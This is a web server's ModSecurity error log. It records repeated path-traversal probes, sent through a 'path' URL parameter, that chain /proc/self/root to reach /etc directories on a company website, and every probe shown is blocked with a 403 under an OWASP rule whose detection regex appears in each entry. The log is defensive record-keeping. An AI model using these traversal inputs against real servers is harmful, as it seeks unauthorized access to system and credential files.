https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:49:23.795249 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:53702] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1IwkwaGbbGflqUZDmYgAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:49:52.284064 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:48502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1QNa6ubjKNq_cu4ZruAAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:49:52.947199 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.243.128:59414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1QOw_le52K8_3pV22OwAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:49:54.391422 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:51670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1QkzinOy1jxa1j4foVQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:50:07.888018 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:51680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1T9a6ubjKNq_cu4ZrywAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:50:10.247154 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:40984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1Uuw_le52K8_3pV22QQAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:50:14.819044 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.243.128:46812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1VkzinOy1jxa1j4foXQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:50:18.238078 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:46826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1WuyqAr6etmhZHNqROAAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:50:20.556869 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:33474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1XNY0UrI5A3LftIxu9gAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:50:25.243304 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.243.128:33486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1YSmAPhZkrhU8w4lDjQAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:50:29.783608 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:33498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1ZUzinOy1jxa1j4foYgAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:50:32.207903 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:51332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1aNY0UrI5A3LftIxvBQAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:50:43.819783 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:51338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1c9Y0UrI5A3LftIxvHAAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:50:52.493229 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.243.128:55604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1fCmAPhZkrhU8w4lDmAAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:50:53.835516 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:32816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1fda6ubjKNq_cu4Zr0wAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:50:55.403367 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:32826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1f_u8EFLIOrSqIpvaxAAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:50:56.675645 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:32834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1gOw_le52K8_3pV22UgAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:50:57.964303 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:32836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1gdY0UrI5A3LftIxvHgAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:03.517069 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:32842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1h9Y0UrI5A3LftIxvJwAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:51:05.879781 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:36470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1ida6ubjKNq_cu4Zr2QAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:14.898396 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:39078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1kuoXxyEfFpUF8f9CuQAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:17.003161 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.243.128:36484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1lUzinOy1jxa1j4focgAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:51:18.731344 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:32932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp1luoXxyEfFpUF8f9CuwAAAUI"], referer: 